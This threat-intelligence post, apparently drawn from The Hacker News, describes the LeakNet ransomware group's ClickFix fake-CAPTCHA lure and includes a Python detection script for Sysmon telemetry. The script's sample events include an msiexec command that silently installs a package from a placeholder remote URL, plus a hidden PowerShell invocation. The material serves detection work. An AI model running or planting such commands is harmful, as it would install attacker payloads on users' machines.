
"The key takeaway here is that both entry paths lead to the same repeatable post-exploitation sequence every time. That gives defenders something concrete to work with: known behaviors you can detect and disrupt at each stage, well before ransomware deployment, regardless of how LeakNet got in."
"The use of ClickFix to breach victims offers several advantages, the most significant being that it reduces dependence on third-party suppliers, lowers per-victim acquisition cost, and removes the operational bottleneck of waiting for valuable accounts to hit the market."
"In these attacks, the legitimate-but-compromised sites are used to serve fake CAPTCHA verification checks that instruct users to copy and paste an msiexec.exe command into the Windows Run dialog. The attacks are not confined to a specific industry vertical, instead casting a wide net to infect as many victims as possible."
LeakNet, a ransomware operation that emerged in November 2024, has shifted from traditional initial access methods such as stolen credentials to ClickFix social engineering. Fake CAPTCHA checks on compromised websites trick users into pasting a malicious msiexec.exe command into the Windows Run dialog, which removes the group's dependence on third-party access suppliers, lowers the per-victim acquisition cost, and ends the wait for valuable accounts to appear on the market. The intrusions then use a staged command-and-control loader built on the Deno JavaScript runtime to execute payloads directly in memory. Whichever entry path is used, LeakNet follows the same repeatable post-exploitation sequence, giving defenders concrete behaviors to detect and disrupt at each stage before ransomware is deployed. Targeting is broad across industries rather than focused on specific verticals.
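The ClickFix entry path described above has a distinctive shape in process-creation telemetry: a command pasted into the Run dialog is spawned by explorer.exe, and the ClickFix variant points msiexec.exe at a package fetched over HTTP(S) rather than a local .msi. The following detection sketch is an added example written for this page, not code from The Hacker News or from any vendor report on LeakNet. The record layout mirrors Sysmon Event ID 1 fields (Image, CommandLine, ParentImage), and every sample event, host name and URL in it is constructed for the example; no real LeakNet indicators are implied.

```python
"""Flag ClickFix-style msiexec.exe launches in process-creation telemetry.

Added example for this page. Field names follow Sysmon Event ID 1
(Image, CommandLine, ParentImage); the sample events below are constructed,
not observed LeakNet indicators.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# A package pulled from a web server instead of a local path or file share.
REMOTE_URL = re.compile(r"\bhttps?://\S+", re.IGNORECASE)
# msiexec switches that install a package: /i, /a (admin), /j (advertise), /package.
INSTALL_SWITCH = re.compile(r"(?:^|\s)/(?:i|a|j|package)(?=\s)", re.IGNORECASE)
# Quiet / no-UI switches: /q, /qn, /qb, /qr, /qf, /quiet.
QUIET_SWITCH = re.compile(r"(?:^|\s)/q(?:n|b|r|f|uiet)?(?=\s|$)", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    image: str          # full path of the new process
    command_line: str
    parent_image: str   # full path of the creating process


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def clickfix_indicators(ev: ProcEvent) -> list[str]:
    """Return the ClickFix tells present in one process-creation event.

    Core pattern: msiexec.exe spawned by explorer.exe (what a command pasted
    into the Run dialog looks like in telemetry) installing a package from a
    remote URL. A quiet switch is corroborating, not required.
    """
    if _basename(ev.image) != "msiexec.exe":
        return []
    hits = []
    if _basename(ev.parent_image) == "explorer.exe":
        hits.append("spawned by explorer.exe (Run dialog / interactive shell)")
    if INSTALL_SWITCH.search(ev.command_line) and REMOTE_URL.search(ev.command_line):
        hits.append("package installed from a remote URL")
    if QUIET_SWITCH.search(ev.command_line):
        hits.append("quiet switch suppresses the Windows Installer UI")
    return hits


def is_clickfix_msiexec(ev: ProcEvent) -> bool:
    """Alert only when both core tells are present; a quiet flag alone is normal."""
    core = [h for h in clickfix_indicators(ev) if not h.startswith("quiet")]
    return len(core) == 2


def triage(events: list[ProcEvent]) -> list[tuple[ProcEvent, list[str]]]:
    return [(ev, clickfix_indicators(ev)) for ev in events if is_clickfix_msiexec(ev)]


# Constructed sample telemetry; hosts and URLs are placeholders.
SAMPLE_EVENTS = [
    # 1. ClickFix-style: pasted into Win+R, fetches the package over HTTPS, silent.
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i https://captcha-check.example/verify.msi /qn",
              r"C:\Windows\explorer.exe"),
    # 2. User double-clicks a downloaded installer: local path, not flagged.
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"C:\Windows\System32\msiexec.exe /i C:\Users\alice\Downloads\7z.msi",
              r"C:\Windows\explorer.exe"),
    # 3. Managed deployment from a share under a service parent, not explorer.
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i \\fileserver\deploy\agent.msi /qn",
              r"C:\Windows\System32\services.exe"),
    # 4. Not msiexec at all; out of scope for this rule.
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -nop -w hidden",
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for ev, hits in triage(SAMPLE_EVENTS):
        print(ev.command_line)
        for h in hits:
            print("  -", h)
```

Only the first sample event trips the rule. When an alert fires, the pasted command also survives in the user's Run history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is a cheap corroborating artifact to pull during triage. The rule deliberately keys on parent explorer.exe plus a remote package URL rather than on any specific domain, since the article gives no indicators and the domains rotate; the Deno-based loader stage is not modelled here because the page does not describe how it is spawned.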
#leaknet-ransomware #clickfix-social-engineering #initial-access-tactics #deno-c2-loader #threat-detection
Read at The Hacker News